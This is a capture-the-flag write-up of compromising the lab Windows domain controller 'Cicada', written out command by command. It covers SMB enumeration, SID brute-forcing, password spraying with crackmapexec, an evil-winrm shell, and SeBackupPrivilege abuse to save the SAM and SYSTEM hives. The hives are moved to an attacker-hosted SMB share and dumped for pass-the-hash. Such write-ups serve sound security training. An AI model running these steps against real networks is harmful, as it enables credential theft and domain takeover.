Enumeration
NMAP
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-23 15:13:58Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
51702/tcp open msrpc Microsoft Windows RPCSMB
Anonymous login to the share /HR is possible.
To view the file, its better to download it.
mget *The file contains a password for a user, but the user is not known.
Searched for usernames in the infrastructure, but unfortunately found nothing. Attempting to enumerate usernames using Impacket.
/usr/bin/impacket-lookupsid [email protected]Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Password:
[*] Brute forcing SIDs at 10.10.11.35
[*] StringBinding ncacn_np:10.10.11.35[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-917908876-1423158569-3159038727
498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: CICADA\Administrator (SidTypeUser)
501: CICADA\Guest (SidTypeUser)
502: CICADA\krbtgt (SidTypeUser)
512: CICADA\Domain Admins (SidTypeGroup)
513: CICADA\Domain Users (SidTypeGroup)
514: CICADA\Domain Guests (SidTypeGroup)
515: CICADA\Domain Computers (SidTypeGroup)
516: CICADA\Domain Controllers (SidTypeGroup)
517: CICADA\Cert Publishers (SidTypeAlias)
518: CICADA\Schema Admins (SidTypeGroup)
519: CICADA\Enterprise Admins (SidTypeGroup)
520: CICADA\Group Policy Creator Owners (SidTypeGroup)
521: CICADA\Read-only Domain Controllers (SidTypeGroup)
522: CICADA\Cloneable Domain Controllers (SidTypeGroup)
525: CICADA\Protected Users (SidTypeGroup)
526: CICADA\Key Admins (SidTypeGroup)
527: CICADA\Enterprise Key Admins (SidTypeGroup)
553: CICADA\RAS and IAS Servers (SidTypeAlias)
571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)
572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)
1000: CICADA\CICADA-DC$ (SidTypeUser)
1101: CICADA\DnsAdmins (SidTypeAlias)
1102: CICADA\DnsUpdateProxy (SidTypeGroup)
1103: CICADA\Groups (SidTypeGroup)
1104: CICADA\john.smoulder (SidTypeUser)
1105: CICADA\sarah.dantelia (SidTypeUser)
1106: CICADA\michael.wrightson (SidTypeUser)
1108: CICADA\david.orelious (SidTypeUser)
1109: CICADA\Dev Support (SidTypeGroup)
1601: CICADA\emily.oscars (SidTypeUser)The following users can be found.
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
Dev Support
emily.oscarsCrackmapexec can be used to validae the user for the password.
crackmapexec smb 10.10.11.35 -u users.txt -p passwords.txtNow I have my user with a valid password — this allows me to search for other users and passwords. Quickly, I find a user who apparently forgot their password and was issued a new one.
crackmapexec smb 10.10.11.35 -u users.txt -p passwords.txt --usersWith the two users and passwords, an attempt can now be made to access the DEV share.
On the share, there is a backup script that contains a username along with a clear-text password. It also specifies which directory this user is allowed to access.
Now an attempt can be made to gain a foothold on the system. In this case, I used evil-winrm to spawn a shell.
And it works, a shell is obtained on the system. The user flag is located in the Desktop folder. I attempted to read the administrator flag, but access was denied. Therefore, privilege escalation to a higher-level user is required.
whoami /privThis provides insight into the current user’s privileges. As it turns out, the user has the SeBackupPrivilege, which allows reading files system-wide. Therefore, we can attempt to copy a Registry hive and crack the hashes locally on the workstation or directly log in using the hash.
reg.exe save hklm\sam C:\tmp\sam.savereg.exe save hklm\system C:\tmp\system.saveOn the attack box, host an SMB share and copy files from the Windows machine.
sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support SAHRENAME SHAREPATHmove sam.save \\10.10.14.16\smb
move security.save \\10.10.14.16\smbWith Impacket, the hashes can then be extracted.
python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -sam sam.save -system system.save LOCALThe login with the hash works perfectly!
The root-flag can be found on the desktop.
